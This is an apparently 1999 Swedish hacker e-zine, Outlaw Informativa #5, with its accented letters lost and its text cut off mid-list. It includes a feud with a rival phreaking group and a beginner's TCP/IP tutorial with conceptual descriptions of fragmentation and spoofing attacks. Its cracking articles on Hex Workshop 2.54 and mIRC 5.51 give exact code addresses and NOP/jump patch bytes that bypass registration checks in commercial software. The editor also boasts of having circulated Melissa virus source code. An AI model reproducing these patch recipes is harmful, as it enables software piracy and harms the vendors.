22:14 1999-05-18





               

                   Heretics Inc. Presenterar...





             _______         __   __     Informativa               

            |       |.--.--.|  |_|  |.---.-.--.--.--.

            |   -   ||  |  ||   _|  ||  _  |  |  |#5|

            |_______||_____||____|__||___._|________|

            =======================================

            |                                       | 

            |  Disclaimer                          | 

            |  Editor                              | 

            |  Mederkande                          |

            |  r 07nio75 riktiga phreakers?       |

            |                                       |

            |  Cracka Hex Workshop 2.54            |

            |  Cracka mIRC 5.51, mIRC Co. Ltd      |

            |  TCP/IP Tutorial fr newbies         |

            |  Ls lokala filer i NT               |

            |  Wingates                            |

            |  Skerhets hl i Netbios             |

            |  nato.int, whitehouse.gov hacked     |

            |                                       |

            |  Enkelt om Terminaler                |

            |  GSM kan lsa av Elmtare            |

            |  Cellulr styrning, update           |

            |  Lite rippat om AXE frn Fidonet     |

            |  Teleutrustning som klarar r2000    |

            |                                       |

            |  Copyright                           |

            |  Prenumeration                       |

            |  eX1t()                              |

            |                                       |

            =======================================

             w w w . h e r e t i c s . c j b . n e t

    

            -Vilka r det som str misstnkta? r det 

             unga hackers? Jo, det r  unga, men  jag 

             skulle inte vilja kalla dem fr  hackers 

             eftersom det ordet ofta  frknippas  med 

             ngon som r duktig p datorer -







 +-------------------------------------------------------------+

     Disclaimer                                               |

 +-------------------------------------------------------------+

 Vi tar inget ansvar fr vad du  andvnder  informationen  till. 

 Information r  endast till fr att  lsas  och  i  utbildnings 

 syfte. Myndighetspersonen r  frbjudna  enligt  lag  att  lsa 

 denna information



 +-------------------------------------------------------------+

 |    Editor                                           [Knash] |

 +-------------------------------------------------------------+

 Var hlsad till issue #5 av Outlaw Informativa !

 Visste du att Carl Bilt r homosexuell? NHHEJ, jag bara skoja.

 Det va en snubbe  som  klagade  lite p mig och sa att jag hade

 skickat Melissa viruset till honom (!?!?!?!?!) hehe, vilket jag

 inte har gjort. Men dremot skickade jag  kllkoden  i  O-I #4,

 men det r en helt annan femma. Zaqe hittade  en  tele-box  med

 ngot slags kretskort  i, grymmt..ahh ?? Jaja, i  detta  nummer

 blir det lite blandat, tja..lite  networking, telefoni, nt  och

 lite cracking. De vanligaste s  klart. Hoppas  tty  fr  ngot

 att titta p den hr gngen.



 +-------------------------------------------------------------+

 |    Medverkande                                              |

 +-------------------------------------------------------------+

 Knash     [knash@linux.nu:keytrace@usa.net]

 Gazzaud   [Gazzaud@operamail.com]

 Overmarzz [mixtile112@hotmail.com]

 Axxezz    [secure contact]



 +-------------------------------------------------------------+

 |    r 07nio75 riktiga phreakers?                 [Overmarzz]|

 +-------------------------------------------------------------+

 Jag surfade in p deras sida och kunde  snabbt  konstatera  att 

 den verkligen inte var bra..



 1: P Main s str dr "...Sveriges aktivaste Phreking grupp.."

 Hahaha..Aktiva?...nja..dom springer runt  med  sina  Beige  och

 "Phreakar" jappasar...japp...d r man verkligen  Phreaker. Dom 

 har inga egna txt filer och p ezine str dr ex bilder  lngst 

 upp(?). Om ezinet? Samma ljliga text om  aktivaste  grupp  och 

 dom brjar vldigt elit genom att skriva 1ntr0 ..

 sen p disclaimer..

 "Informationen i vrat zine r ndast till fr  att  lsas, och 

 om du gr ngot olagligt shit efter at"

 

 LOL...shit..rollie kan engelska.. 

 Beige boxing skola..? Har inte  alla  svenska  phreakers  redan 

 skrivit det?

 hmm

 all'4'free? iofs s heter det everything... Men att sno  mm  r 

 inte speciellt sknt..Boxing lista.. Blast: Bra om du vill spr-

 nga nns trummhinna...HAHA..ska en telefon  lur  lira  145-155 

 db?? HAHA



 ---

 Heretics?

 "Heretics Medlemmar" frstr fr 07nio75 medlemmar. Dom  pstog 

 att en heretics medlemm vid namnet "Phencier" hadde sparkat och 

 slitit snder Oizo's Japan. Phencier  r  inte  p  ngot  stt 

 aktiv eller medlem i hertics och jag tycker det r vldigt kr-

 ngande av R Tyler att g ls p tangenbordet  innan  nn  fakta 

 ligger p bordet. Det oproffitionela uppfrandet kan tolkas  p 

 mnga stt och jag har krvt en artikel som reder upp  detta  i 

 nsta zine. Den listan har jag sett nnstans och  den  r  100% 

 rippad och versatt

 ---

 Carding..?

 Inte bli "bustad" ..hahaha...

 Oj vad svrt fr dom att spra det..men  rollie lurar  dem  med 

 sina  enastende  kunskaper  och  till  sist  har  han  skrivit 

 "..Phreaking  r inte bara kul, utan ven en verlevnads stil."

 

 Jag sjlv tycker  inte riktigt om att "kriga" men  han  brjade 

 helt utan fakta...Jag  har aldrig  sagt  att  jag  r  en  elit 

 Phreaker/hacker s kom inte oh klaga!

 

 Jag knner 2 medlemmar  i 07975..[S]tasS r skit juste  men  en 

 REN irc:are ^MaZz^.. Har aldrig  Phreakat..Vet  inte  vad  lmhs 

 eller beige r. Dom har vldigt hga  frvntningar ...HAHAHAHA 



 +-------------------------------------------------------------+

 |    Cracka Hex Workshop 2.54 Breakpoint Software   [Gazzaud] |

 +-------------------------------------------------------------+



 [Skydd]

 Cindirella/Seriell

 Niv: Medel

 Ingrepp: NOP/INVERT

 

 -==- Frord -==-

 Fr alla er som behver  en  bra  Win32  hexeditor, hr r  en 

 av mina favoriter. Den r  ngorlunda liten, 3  897  706  byte 

 installerad och  vldigt kraftfull. Jag  har  tidigare  anvnt 

 version 2.00  men efter det  att Axxezz ppekat  frdelen  med 

 den nya versionen s laddade jag hem den frn www.bpsoft. com.

 version 2.00  men efter det  att Axxezz ppekat  frdelen  med 

 En hel del buggfixar, men jag  mste  erknna  att jag r lite 

 besviken  p   deras  protection-scheme. Precis  som  med  The  

 Customiser    sparade   jag   mina  anteckningar  fr  att  ge 

 nybrjarna lite  steg-fr-steg. 



 --// Grabbing the Tools of the Trade \\--

 // Str Ref \\

 Frst kollade jag runt lite efter anvndbara strngreferenser.



 Str Ref -> "Demonstration Version"

 00429B6E



 00429B51   movsx eax, word ptr [0048CFF8]

 00429B58   test eax,eax

 00429B5A   jne 00429B88



 Egentligen ingenting anvndbart  eftersom  vi  inte  har  ngon

 funktion utan bara  en  kontroll  av  en  variabel. Men  kanske

 kan vi ha lite tur, s  vi  sker  efter [0048CFF8] och  hittar

 den vid: 00429610, 004299AF, 00429B51. Tyvrr bara  kontroller,

 ingen funktion som lgger ngot vrde  i  variabeln. S  mycket

 fr strngreferenser. S vi tar och brjar  nysta  i  en  annan

 nde. 



 -%%- Dialoger -%%-

 Som ni ser i data sektionen  av  HexWorkshop  finns  det  mnga

 dialoger i programmet. En fr frsta gngen vi kr  programmet, 

 en fr nr vi brjar f lite tid kvar, en nr tiden gtt ut men 

 vi fortfarande har lite "grace time" kvar och  en  nr  det  r 

 totalkrt. En rolig sak r att de ocks har en  dialogruta  som

 dyker upp om versionen blivit fr gammal. 



 DialogID_0073, referenced at:

 00425C55

 is referenced by: 004297F0

 00461D20 (Drawing the dialog etc) 



 Observera den hr funktionen :

 00429776   call 0042E800 (terkommer till den alldeles strax) 



 DialogID_00C1, referenced at:

 004273D5, called by 00429792

 Look at 00429776 -> if je, then call 0042EA35 and if ne 

 there, call 00425C30 which shows DialogID_0073.



 Ser ni det mrkliga? Knner ni lukten av  rdd  kod? Knner  ni 

 stanken av  deras  protection? Jag tror *sniff* bestmt *sniff* 

 att den *sniff* kommer frn... *sniff* 

 Registret! Sparka igng Regedit (C:\Windoze\Regedit.exe) s tar 

 vi oss en titt. 



 [HKEY_LOCAL_MACHINE\SOFTWARE\BreakPoint\Hex Workshop\]

 CurrentVersion = "2.50" <- varfr inte 2.54?

 Path = "Drive:\PAth\HWORKS32.EXE"

 Ouw... 

 [HKEY_LOCAL_MACHINE\SOFTWARE\BreakPoint\Hex Workshop\2.50]

 Major = 0xF8F3F830

 Minor = 0x00000000 



 Om ni vill g in p alla pinsamma detaljer  angende  detta  s 

 tittar ni i funktionerna 0042EA35, 0042E800 & alla de andra som 

 anropas fr att avgra vilken dialogruta som ska visas. Jag ska 

 dra en snabbgenomgng fr alla som r nyfikna  men  inte  orkar 

 kolla. Trots BreakPoints frsk att visa p  motsatsen  s  har 

 Major och Minor ingenting med versionen avprogrammet  att  gra 

 (NH! ;-). Major lagrar ett datum, i mitt fall  7nde  December

 1999 (Bst fre-datum tydligen), och Minor r en statusvariabe-

 l. Testa att ndra Minor till 0xBB000000 och starta HexWorksho-

 p. Kul dialogruta, eller hur? Ni kan nu ndra  tillbaks  om  ni 

 vill, men jag lmnade registret  sdr  fr  att  veta  nr  vi 

 lyckats 'registrera' programmet.  



  --/-/ Nu ver till allvaret \-\-- 

 Alla  dessa  kontroller  mot  Registret  ligger  inom  funktion 

 004295A6, som anropas frn 0042999A. Denna anrops-snutt av  kod 

 anropas bara beroende p ett (C) hopp vid 00429980.



 00429978   call 00429403

 0042997D   cmp eax,1

 00429980   jne 0042998D (kontrollerna)

 00429986   xor eax,eax

 00429988   jmp 00429E9E 



 Hmmmmm... Intressant? Faktiskt inte ett dugg.  Men  ibland  kan 

 det vara kul och gra er  lite  nervsa :-). Funktion  00429403 

 kontrollerar bara om det finns en HW.INI, skert pga bakt-kom-

 pabilitet till 16-bit.

 

 --{ Trace Main }--



 S  eftersom  vi  nu  har  hamnat  i  programmets  Main-sektion

 (eller WinMain om vi ska vara riktigt petiga (inte fr att  det 

 behver vara WinMain i ett Assemblerprogram)). S ska vi vl ta 

 och avsluta  den  hr lilla, men  ack  s  lrorika, utflykten, 

 eller vad  sger  ni? Vi  kollar  igenom  alla  funktioner  som 

 anropas innan den som vi just kom ifrn (dr r  det  ju  redan 

 bestmt om vi r Registrerade eller inte) och hittar  00437540. 

 Tjohopp. Kunde vi tagit en enklare vg? 



 Jajamensan: Str  Ref ->  "HEXWORKS.REG", 



 men d hade ni ju missat halva deras  protection. Det  hade  ju 

 varit illa. S ta ett djupt andetag, titta  igenom  funktionen,

 flj koden, knn hur den rr sig, vart den  gr  och  ta  sedan 

 fram skalpellen och knck HexWorkshop 2.54. 



 |------------------------------------|

 

 [Slutsats]

 004375AC - NOPNOPNOPNOPNOPNOP

 004375D5 - NOPNOP

 004375FB - E91901000000

 Fyll HEXWORKS.REG med 220-250 byte.





   -----///: Efterord :\\\-----



 S nu har vi 'Registrerat' ett i framtiden viktigaste  av  vra 

 verktyg. Ska bara ta en liten funderare kring deras protection-

 scheme. Frst och frmst tycker jag deras Registry-taktik r  i 

 lite  vekaste  laget.  Vem  r  den  avsedd  att  lura? Vanliga 

 anvndare? Tror inte dom r inne i  Registret  och  rjer  allt 

 fr ofta. Crackers? Nr en nybrjare som jag  lyckas  lista  ut 

 deras   protection?  Ooo,  knner  trygga  BreakPoint. Dessutom 

 frstr jag inte pongen med att lsa frn Registret  s  mnga 

 gnger, en per eventuell dialog. Om de nu frskte lura oss att 

 Minor & Major hrde till versionen, varfr inte  bara  lsa  in 

 dessa vrden en gng? Ingen sitter och  kontrollerar  versionen

 p sitt program, runt  fem  gnger, *i rad*. Deras .REG fil  r

 inte mycket  till  skydd  heller (som ni mrkte), mestadels pga 

 att den finns med frn brjan. Tom givetvis, eftersom dom  inte 

 grna kan lmna  ut  ett  seriell/anvndarnamn. Men  hur  mnga 

 brjar inte fundera  om   dom  ser  en  *tom*  fil  med  i  sin 

 installation? Som dessutom slutar p ndelsen .REG. S  hur  r

 nu .REG  uppbyggd? Bra, frga. Jag  vet  inte, och  jag  tnker 

 heller aldrig ta reda p det. nda syftet med det vore fr  att 

 gra en KeyGenerator och sdant gr jag inte. Det har inget med 

 ngon gloris etik att gra, utan bygger  mer  p  tv  faktum: 

 vill dom ha ett fungerande program, knck det  sjlva  och  det

 faktum att seriellnummer finns det redan  flera  miljoner  lite 

 verallt p ntet. Det r ingen som lr sig ngonting av det. 



 ///  Skriven av:

          Gazzaud



     @  #SweHack, #Programming.se, #crack



 Mailto:  Gazzaud@operamail.com



 \\\



 +-------------------------------------------------------------+

 |    Cracka mIRC 5.51, mIRC Co. Ltd                 [Gazzaud] |

 +-------------------------------------------------------------+

       ***************************************************

       *                                                 *

       *                       mIRC 5.51                 *

       *                                                 *

       *                      mIRC Co. Ltd               *

       *                                                 *

       ***************************************************



 [Skydd]

 Cindirella/Seriell

 Niv: Enkel

 Ingrepp: NOP



 -==- Frord -==-



 Fr att skapa ett bttre intresse kring cracking (inte malicio-

 us hacking utan +ORC's cracking) s ska  jag  frska  leverera 

 lite cracks av och om lite mer 'mainstream' program. Annars har 

 det ju mestadels varit verktyg  anvndbara  fr  cracking. Alla 

 vet vad mIRC r, och just nu r 5.51  senaste  versionen. Deras 

 protection r s enkelt att det r nstan  enklare  att  cracka 

 deras   program  n  att  hitta  ett  seriellnummer  eller  ett 

 'ready-made' crack. Ni ska f se. 



 String Ref "Your registration has been entered 

 successfully." @ 00436E04



 String Ref "Sorry, your registration name and 

 number don't match!" @ 00436E68

 Ref by: (C) 00436D81



 00436D7A   call 00493CFC

 00436D7F   test eax,eax

 00436D81   je 00436E22



 00493CFC is Ref by: 00436D7A, 00493E93



 Hmmmm?



 Ne...



 [HEX]

 00493E9A NOPNOP

 00436D81 NOPNOPNOPNOPNOPNOP 



 --// Avslutning \\--



 Jupp. Mer n s var det inte. Jag gjorde den lite

 avsiktligt kort, eftersom ingen verkar bry sig om

 ngra utfrligare beskrivningar nd. Kommentarer

 skickas till det vanliga stllet...  



 // Gazzaud



 +-------------------------------------------------------------+

 |    TCP/IP Tutorial fr newbies                      [Knash] |

 +-------------------------------------------------------------+

 TCP/IP r ett Ntverks protokoll som frn brjan  var utvecklat

 av ARPAnet. Protokollet som tar hand om  en  stor  del av ntv-

 erks trafiken. Jag sg faktiskt en film om Internet's historia,

 titeln p filmen var ju lite hgt lam faktiskt (Historian om @)

 men innehllet va mycket intressant, dom visade den frsta ser-

 vern osv. som sg ut som ett kylskp. TCP/IP str fr Transmis-

 sion Control Protocol/Internet Protocol. TCP/IP r ven en  del  

 av kerneln i  Unix, ven r TCP/IP  ett  OSI  baserat protokoll  

 (ls om OSI senare i artikeln) Fr er som inte vet s str  OSI 

 fr: Open System Interconnection. 



 Till   Alla  Newbies: Internet  r  ett  ntverk, faktiskt  ett 

 WAN (Wide  Area Nework) allts  flera  LAN (Local Area Network)

 som r ihopkopplade. Frn brjan va det bara  ett  LAN  som  va 

 baserat p TCP/IP, men det va lnge sen  d  ARPAnet  pysslade.





   Open System Interconnection [OSI]

   TCP/IP Modellen

   TCP Header

   TCP Flags 

   IP Header

   UDP Header

   Sammanfattning av huvudsyftena i tcp/ip

   Vanliga TCP/IP attacker

   UDP och TCP, skillnader och nackdelar

   Portar som andvnder TCP/IP, UDP

   G vidare

   Efterord

   Tack Till

   Kllor



  

 

 -==- Open System Interconnection [OSI] -==-



 OSI modellen r baserat p 7 olika lager.



  7.  Application Layer

  6.  Presentation Layer

  5.  Session Layer

  4.  Transport Layer

  3.  Network Layer

  2.  Data Link Layer

  1.  Physical Layer

 

 Jag tog dom p engelska, det ser bttre ut d.



 Mellan dom olika lagrerna skickas paket, varje  lager tar  hand

 om sin  uppgift. , vre lager  och  nedre  lager. Nr  ett

 paket skickas frn din dator passerar den  alla 7 lager, frn 7

 ner till 1. Nr du tar emot ett paket passerar den ven d fast

 den motsatta vgen, frn 1 upp till 7.



 Listan ovan r de standardiserade lagrerna, det kan finnas

 andra namn fr dem p andra platformer.

 

 Man  skulle  kunna  dela  upp  dom  olika   OSI  Lagrerna  i  2 

 sektioner.

 

 Den  vre delen av OSI Modellen tar hand applikationer, och  r 

 ofta redan inprogrammerat i Mjukvaran.



 Den lgre delen tar hand om transporten av data, IP paket  osv.

 Physical Layer och Data Link Layer r inprogrammerat i hrdvar-

 an  och mjukvaran.





  -{ vre Lagren }-

                     

  Application Layer

  Presentation Layer

  Session Layer

                      

  -{ Lgre Lagren }-

                       

  Transport Layer

  Network Layer

  Data Link Layer

  Physical Layer





  Application Layer

  

 Applikations Lagret somboliserar den aktiva applikationen   som

 arbetar i Exempel: Netskape, Cute FTP, Word, Excel. Texten ell-

 er bilden eller vad du nu arbetade med skickas vidare till nt-

 sta lager.



  Presentation Layer

  

 Detta layer sker i dina bilder, ascii filer  efter  formaterad

 text (typ, font  size, font color, typsnitt) Presentation Layer

 frsker ven komprimera informationen s att paketet inte  ska

 bli stort och som ska resultera  en  snabb  tcp/ip  connection.

 T.ex. en textfil skulle kunna komprimeras 80%, men med en  bild

 blir det mycket svrare pgrund av binrt innehll osv.



  Session Layer

  

 Detta layer tar hand om trafiken och skickar paketen nert till 

 de lgre lagret.



  Transport Layer

  

 Detta lager lgger till lsningar  frn  CRC (Cyclic Redundancy 

 Checking) till eller  frn  paketet. CRC  kontrollerar  s  att

 inte paketet har blivit forkortat p ngot stt.



  Network Layer

  

 Konverterar och  addresserar. "Logical Adresses" till "Physical

 adresses" eller s  som "nodenumbers" och  IP  Addresser. Detta

 layer ligger vldigt nra hrdvaran. Allts tar  ven  ntverks 

 hrdvaran hand om detta, men inte endast!



  Data Link Layer

  

 Detta layer r updelat i tv parter: LLC (Logical Link Control) 

 och MAC (Medium Access Control) LLC kontrollerar vilket protok-

 ll som andvnds och arbetar tillsammans med Layer 3 (Network L-

 ayer) MAC tar hand om vilka driv rutiner  som  anvnds  fr  de

 olika   Kommunikations  Tillbehren.  MAC   kontrollerar   ven

 frametype (t.ex. 120.4, 120.3, 120.6)



  Physical Layer

  

 Den hrdvaran som behvs fr att kunna kommunicera (t.ex. fibe-

 roptik  kabel,  nollmodem   kabel,  modem  och  ntverks  kort)

 Detta funkar ganska enkelt, paketen konverteras till ljus eller

 elektriska impulser beroenda op vilken slags verfrings  media 

 man andvnder.





 -==- TCP/IP Modellen -==-



 TCP/IP modellen bestr av 4 olika lager. ven hr kan man frd-

 ela lagrerna i 2 olika sektioner vilket r  ganska  enkelt  att

 gissa.

 

  Application Layer

  Transport Layer 

  Internet Layer

  Network / Physical Layer



  

   Network / Physical Layer (Ntverk / Fysiskt lager)

   

 TCP/IP har en grymmt minimal uppgift att ta hand om Ntverks o-

 ch de fysiska lagret. Eftersom det mesta lmnas t hrdvaran...

 s som Ntverks kort och Modem.





   Internet Layer

   

 r ett av de viktigista lagrerna eftersom den tar hand om addr-

 essering av IP paket. Den tar ocks hand om vxling av  paketen

 (Packet Routing)



  

   Transport Layer

   

 Juppz, detta r ocks ett mycket viktigt lager (checka bara  p

 namnet, s fattar du) Transporterings  lagret tar emot data fr-

 n Applikations Lagret (Application Layer) som sedan  Transport

 Lagret frbereder fr att  sedan  bli  utskickat  i  Ntverket.

 Det finns 2 olika typer av transport lager  protokoll, UDP  och

 TCP, UDP str fr User Datagram Protocol.





   Application Layer

   

 r ofta inprogrammerat i kommunikations program, t.ex. web bro-

 wsers, FTP klienter, Telnet Klienter osv. Applikations Protoko-

 llet definerar grnssnitt genom olika  applikationer (program).





 -==- TCP Header -==-



 Alla  TCP/IP "Headers" och "Layers" kommunicerar  med  varandra

 och det r i princip det som r grejen med  TCP/IP  networking.

 Jag tnker inte frklara allt i detalj nr det gller TCP Head-

 ern och det finns 2 anledningar till det: Jag kan inte s myck-

 et om TCP Headern ver huvudtaget och att detta ska bara  vara

 ganska grunlggande.



  TCP Header

 

                                          

  

   SRC PORT                    DST PORT 

  

            SEQUENCE NUMBER              

  

              ACK NUMBER                 

  

   DATA    Reserved  U|RST|S  Windows 

   OFFSET  Field     F|A|P    Field   

  

   CHECKSUM                  URGENT PTR 

  

                                          



 SRC Port (Source Port)

 

 Dr  datorn  snder  ut  paketet  skriver porten paket skickas 

 ifrn och skickar ivg det.

 Size: 16 bit





 DST Port (Destination Port)

 

 r dit paketet ska, SRC port skickar paketet och DST  port tar

 emot den.

 Size: 16 bit





 Sequence Number

 

 Identifierar paketets plats fljd av sekvens TCP verfringen.

 Size: 32 bit





 ACK Number

 

 ACK Str fr acknowledgement som sen sammanbinder acknowledge-

 ment number. ACK paketet tar SEQ numret frn det paket den ska

 verifiera och helt enkelt kar med 1 (satt p on) Nr en conn-

 ection r etablerad r alltid r ACK allid skickat.

 Size: 32 bit





 DO

 

 DO r en synonym och str fr Data Offsets (All teknik som  r

 uppdelat i ett flertal delar andvnder alltid synonymer, t.ex.

 telefonvxlar, internet protokoll) DO r ett nummer som indik-

 erar var datan brjar.

 Size: 4 bit

 



 Reserved Field

 

 r ett reserverat flt fr obestmda tillfllen d data ska

 verfras osv. Reserved Field r alltid r satt p (0)

 Size: 4 bit

 



 RST

 

 Reset Flag terstller en connection.

 



 S

 

 Syn Flag, det finns ngot som kallas fr TCP SYN  Flooding  dr 

 buggar i TCP systemet utnyttjas. SYN str fr synchronize sequ-

 encenumber.



 Lt oss sga att en klient frsker etablera en connection  med

 en server. Klienten och Servern vxlar ett stt med olika mede-

 landen fr att bilda en inre data struktur fr att kunna  klara

 kontakten med servern (Har jag fel?)

 Denna lilla sak kallas fr 3-Way Handshake.

 ______________________________________________

 TCP Connection Establishment (3-way handshake)

 

 3-way handshake brjar nr klienten startar en "Connection Req-

 uest" genom att verfra ett SYN  Medelande  till  servern. Nr

 servern tar emot SYN Medelandet s  skapar  servern  en "entry"

 i serverns oavgjorda TCP connection DATA struktur  och  skickar

 ett SYN-ACK medelande som svar till klienten. Klienten avslutar

 "3-way handshake" genom att svara med ett  ACK  medelande  till

 servern. Var kommer TCP SYN Flooding  in  i  bilden ? .. jo fr 

 att attacken (Flood) mste kunna skicka ver data  till  datorn

 mste den ju ocks etablera en connection-

 

 Mer om "3-way handshake" kommer i  senare  artiklar, mjligtvis 

 i O-I #6.





 F

 

 Fin Flag andvnds fr att  stnga  connections  (=anslutningar)

 Varje avslutning av en connection skickar ett paket med Fin Fl-

 ag, som mste bli bekrftad (godknd kan man ocks sga)  ocks

 kan jag bertta att  fyra paket  andvnds  fr  att  stnga  en 

 connection.



 A

 

 Ack Flag





 P

 

 Push Flag





 WINDOW

 

 Numret som "data octets" brjar med den som indikerar i acknowl-

 edgment field som sndaren sjlvklart vill acceptera.

 Size: 16 bit





 CHECKSUM

  

 Detta r ett valfritt flt som skerhets kollar s att datan  i

 ett paket inte r skadad. Checksum kontrollerar allts  i  stor

 del att det inte r skett ngra fel i tcp verfringen.





 -==- TCP Flags -==-



 TCP flaggorna r antingen satta 1(on) och 0(off)





 SYN Flag

 

 SYN = synchronize

 Denna flagga r satt p on nr ett fjrr-system vill starta  en

 tcp anslutning.





 ACK Flag

 

 ACK = acknowledge

 Nr denna flagga r p  on  aktiveras "Acknowledgement field" i

 TCP Headern.





 FIN Flag

 

 Nr denna flagga r satt p on, talar den om fr fjrr-systemet

 att avsluta  tcp anslutningen.





 RST

 

 Nr denna flagga r satt p on talar den om  fr fjrr-systemet

 att tcp anslutningen mste bli terstlld (reset)





 URG Flag

 

 URG = Urgent Pointer Field

 Nr denna flagga r satt p on talar den om fr "application l-

 ayer Program" att paketet r angelget.



 

 PSH Flag

 

 PSH = Push Function

 Nr denna flagga r satt p  on, blir  fjrr-systemet  att  ett

 stort antal paket som r p vg.





 -==- IP Header -==-



 Alla paket frn TCP och UDP blir skickade  till  Operatorn  fr

 vxling. IP lgger till en header innan paketen levereraras vi-

 dare. IP Headern r mycket enklare en TCP men vldigt  viktigt.



  IP Header

 

                                             

  

   VER  LENGHT  SERV TYPE  PACKET LENGHT  

   IDENT    DF   MF    FRAG OFFSET       

   TTL  TRANSPORT  HEADER CHECKSUM        

   SENDING ADDRESS                          

   DESTINATION ADDRESS                      

   OPTIONS  PADDING                        

  

                                             



 !!! Alla defentioner tas inte med !!!



 VER

 

 Ett enkelt litet flt som hller  reda  p  vilken  version  av

 protokollet som andvnds.





 LENGHT

 

 Detta r lngden p IP Headern.



 

 PACKET LENGHT

 

 Detta r lngden p hela paketet.





 IDENT

 

 Ett enkelt litet flt som hller  reda  p  vilken  version  av

 Detta r en unik identifierad som andvnds fr att re-assamble-

 ra fragmenterade msg:s.





 DF

 

 Nr denna flagga r satt p on gr inte msg:et att fragmentera.





 MF

 

 Denna talar om fr fjrr-datorn att mer fragmentering av medel-

 andet r p vg. Fragmenteringen blir "re-assembled" av Intern-

 t Layer.

  



 FRAG OFFSET

 

 Hller positionen av de specifika paketen i serien av fragment-

 erade paket.





 TTL

 

 TTL = Time To Live

 Utan detta flt skulle alla data paket flyta omkring fr allti-

 d. Nr TTL r uppe s kasserar den alltid nr  ett  data  paket

 flyter till punken 0(off) s "dr" dom.





 TRANSPORT

 

 Detta  flt  innehller  numret frn "Transport Layer Protocol"

 som behandlas i kll systemet.





 SENDING ADDRESS

 

 r adressen frn sendnings systemet, allts var ifrn paketen

 kommer ifrn.



 DESTINATION ADDRESS

 

 r addressen dit paketet ska.





 -==- UDP Header -==-

 UDP Headern r mycket enklare n vad TCP Headern r  eftersom

 UDP headern inte  sammanhller  lika  mycket  information som 

 TCP. 



                          

 

  SRC PORT    DST PORT  

  LENGHT      CHECKSUM  

 

                          



 Alla flten i UDP headern r exakt samma som  i  TCP headern,

 fr att f en beskrivning r det bara att g till  titeln TCP 

 Header.

 

 

 -==- Sammanfattning av huvudsyftena i tcp/ip -==-



 TCP : Tar han om verfringen och ser till s att allt skick-

       as ivg sen tar IP hand om var den ska skickas.



 IP  : Tar hand om adresseringen och routing av  paket  mellan 

       olika vrdar och  ntverk



 ICMP: r dock ett  enskilt  protokoll, men  kommunicerar  med

       tcp/ip genom att rapportera fel osv.



 ARP : Lite mera komplicerat, ven detta kanske  dyker  upp  i

       senare  artiklar. Skaffar  fram  hrdvaruadresser  (MAC)

       frn olika som ligger i samma Ntverk.

 



 -==- Vanliga TCP/IP, UDP attacker -==-





 IP Hijacking

 

 Andvnds fr att styra om TCP paket  strmmen  s  du  kan  bli

 godknd  och  komma  frbi  skydd  ssom  t.ex. Firewalls, one-

 time password och ticketing authentication.

 



 Packet Fragmentation Attacks

 

 Jag har frklarat lite enkelt ovan om Packet Fragmentation, men

 doch inte i helhet. Packet Fragmentation r en del av IP som d-

 elar in datagram i flera olika delar vid verfringen som sedan

 blir tillbaka delat till ett datagram nr den nt DST Port (De-

 stionation Port)



 Exempel:



 SRC Port                       DST Port 

 .--------.       _            .--------.

 |        |      |P|_          |        |

 |Datagram| ===>  |P| _  ===> |Datagram|

 |        |          |P|      |        |

 '--------'                   '--------'



 P = Paket (eng. packet) ..tnke att ni inte e s bra p engels-

 ka som jag inte r =-o)



 Attacken:

 

 En  Packet  Fragmentation  Attack  kan  andvndas fr att komma 

 frbi en en befintlig Firewall, men detta  beror  inte  p  hur 

 Paket Fragmenteringen r uppbyggt, fast en liten del hur paket-

 en blir "reassembled" 



 Ett datagram ska bli uppdelade i flera paket som  lmnar  huvud 

 portionen av paketet ofrndard. Ok, men skit samma. Nu ska jag

 bertta teoretiskt hur det funkar :-O



 Elajt Cr1Xx0rH4Xx0r skapar  ett  litet  paket som fodrar sig att

 vara den frsta biten i ett "multi-packet datagram" Den r

 r skriven p ett stt som visar sig att den ska genom  port  80

 och ska till "http service" och port 80 r  ppen  verallt  som

 standard. Universitet, Arbeten har stor nytta av  http  idag, s

 drfr tillter Brandvggen elr. Paket Filtret att paketet  ker

 frbi. Elajt Cr1Xx0rH4Xx0r ndrar vrdet  som  hnvisar  paketet

 genom port 80 till port 23 som andvnds av  telnet, men  hoppsan

 nu fick han ju telnet access ocks...



 Voila ! ..firewalls och filter kan dra t helvete !



 PS. om du vill veta mera om Packet Fragmentation Attacks s

     hnvisar jag  dig  till "TCP packet fragment attacks against 

     firewalls and filters" som r mycket informativ. Visserligen

     s beskriver den inget praktiskt. Men de teoretiska gr all-

     tid fre de praktiska DS.



 IP Spoofing

 

 IP Spoofing eller  IP  Faking  r  en  attack  som  ndrar  dit

 IP till ett annat. Detta kan andvndas fr att gmma  identitet

 eller  skydda  dig   mot  DoS  attacks  (DoS=Denial Of Service)

 Denial Of Service r attacker mot TCP/Ip ssom Flooding, Nuking

 osv som kan f en tcp   connection  att  hnga  sig  eller  bli

 upptaget s att tcp anslutningen inte kan andvndas.



 ok. jag  tog  ju inte upp alla de vanligaste. Men hmm...jag har

 ju  inte  studerst  dem  alla. Jag hade ngot underlig knsla i

 kroppen att artikeln va brodskande.





 -==- UDP och TCP, skillnader och nackdelar -==-



 TCP andvnder en fast  anslutning (som en kanal) dr  all  data

 gr igenom medans UDP inte har fasta anslutningar, utan  allti-

 ng skickas ivg i form av Paket. UDP skulle kunna gmnfras med

 radio och TCP med telefon. Signalerna frn  radion  kan  fngas

 upp och manipuleras medans telefonens elektriska impulser skic-

 las via en bestmt kabel. Du vet gamla ICQ anvnde  ju  sig  av 

 UDP, det var drfr dessa ICQ Spoofers funkade. En  ICQ Spoofer

 kunde allts  andra  skicka  messages  frn  andra  andvndare.

 Kunde andvndas fr att bryta vnskap osv. [h0h0]

 



 Exempel p UDP connection

 

  ______             ______

 |      | -->  -->  | DST  |

 | UDP  | ---> ---> | HOST |  (Frn Basics of TCP/IP)

 |      | -->  -->  |      |

               

 Som du ser andvnder inte UDP en fast anslutning till  DST  Host

 (Destination Host)  Medans  TCP  andvnder  en  fast  anslutning

 (se. exempel p TCP connection nedan)





  Exempel p "3-way-handshake"

  

  ______                    ________

 |      | ===========> 500 | REMOTE |

 | TCP  |                  |  HOST  |  (Frn Basics of TCP/IP)

 |      | <======= ACK 501 |        |   

                      

 TCP andvnder "3-way-Hanshake" fr  att  starta  en  fast  data

 verfring. Jag tog upp tidigare lite enkelt  om  SYN  och  ACK

 Flags och i Exemplet nedan p en "3-way-Handshake" och  det  r

 dr dom kommer in :)





  Exempel p "3-way-handshake"

  

      ______                           ________

 1:a |      | ===========> SYN SEQ 10 | REMOTE |

 2:a | TCP  | SYN SEQ 400 ACK 11 <=== |  HOST  |  (Frn Basics of 

 3:e |      | ==============> ACK 401 |        |   TCP/IP)

  ^                              

  |

 Steg i verfringen.





 -==- Portar som andvnder TCP/IP, UDP -==-



 Jag kan bertta att alla dessa services andvnder sig av 

